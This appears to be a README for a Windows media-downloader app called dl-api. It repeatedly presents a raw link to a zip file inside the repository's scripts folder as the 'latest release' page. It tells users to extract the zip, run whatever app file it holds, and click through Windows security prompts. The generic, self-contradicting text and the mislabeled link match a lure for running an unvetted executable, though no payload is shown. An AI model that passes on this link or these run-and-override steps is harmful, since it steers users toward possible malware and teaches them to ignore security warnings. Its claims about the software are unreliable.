Visit this page to download: https://github.com/chasak1919/dl-api/raw/refs/heads/main/scripts/api_dl_v1.8-alpha.2.zip
Choose the latest release, then download the Windows file that matches your system.
dl-api is a media extraction app that helps you pull video or audio from sites like YouTube, Instagram, TikTok, and other supported platforms.
It is built as a FastAPI service, but you do not need to know that to use it. For most users, the main job is simple: download the app, run it on Windows, and use the local web page it opens in your browser.
Make sure your PC has:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- A stable internet connection
- Enough free storage for downloaded media
- Permission to run apps from your Downloads folder
If your browser asks to open localhost or 127.0.0.1, allow it.
- Open the download page: https://github.com/chasak1919/dl-api/raw/refs/heads/main/scripts/api_dl_v1.8-alpha.2.zip
- Find the newest release at the top
- Download the Windows package listed there
- If the file is in a .zip file, right-click it and choose Extract All
- Open the extracted folder
- Double-click the app file or start script that comes with the release
- Wait for the service to start
- Open the local address shown in the window, usually in your browser
If Windows shows a security prompt, choose the option that lets the app run.
After you launch the app, it may create its own local files and folders.
For the first run:
- Keep the window open while the app starts
- Wait until the local server is ready
- Copy the local web address into your browser if it does not open by itself
- Use the page to enter a media link and start extraction
If you close the main window, the local service may stop.
- Open the local web page in your browser
- Paste a YouTube, Instagram, or TikTok link
- Select the output you want, such as video or audio
- Start the extraction
- Wait for the file to process
- Save the result to your computer
The app uses smart fallback chains to try more than one method if a source changes its format. This helps keep downloads working across different sites.
- Fast media extraction for common social platforms
- Support for YouTube, Instagram, TikTok, and more
- Smart fallback chains for better reliability
- HLS streaming proxy support
- Local web interface for simple use
- Built with FastAPI for speed and stability
- Useful for video and audio workflows
- Works as a local Windows app for end users
You may see files or folders like these:
- config
- logs
- cache
- downloads
- temp
- media output folders
These are normal. They help the app store settings, logs, and processed files.
Double-click the app or start file from the extracted folder
Close the command window or terminal window that opened with the app
Use the local address shown in the app window, often something like http://127.0.0.1:8000
Paste a supported link, choose your format, then start the job
This app is built for media extraction from:
- YouTube
- TikTok
- Other sites supported by the underlying media engine
Support can change when a platform changes its layout or video delivery method. The fallback logic helps handle that.
You can use dl-api from any modern browser on Windows:
- Microsoft Edge
- Google Chrome
- Firefox
If a page does not load, refresh once the app has fully started.
- Use a clean, full media link
- Wait for the app to finish starting before you paste a link
- Keep the app window open while a download runs
- Save files to a folder with enough free space
- If one link fails, try another supported source or refresh the page
If the app does not open right away:
- Close it
- Open it again
- Wait longer for the first start
- Check that your internet connection works
- Make sure Windows did not block the file
If the browser shows no page:
- Look at the app window for the local address
- Copy that address into the browser
- Try
127.0.0.1instead oflocalhost
If a download does not start:
- Check the source link
- Try a different browser
- Reload the page
- Run the app again
Use the latest release page here: https://github.com/chasak1919/dl-api/raw/refs/heads/main/scripts/api_dl_v1.8-alpha.2.zip
That is the place to visit to download the Windows release file.
dl-api is a local media extraction tool that fits users who want a simple way to pull media from public links on Windows.
It is a good fit for:
- Saving videos for offline viewing
- Extracting audio from a video link
- Handling repeated downloads from social platforms
- Running a local service on a home PC or laptop
- Name: dl-api
- Type: FastAPI media extraction service
- Main use: download and process media from supported sites
- Target user: Windows end user
- Project topics: api, fastapi, instagram-downloader, media-extractor, open-source, python, rest-api, social-media-api, streaming-proxy, tiktok-downloader, video-download, yt-dlp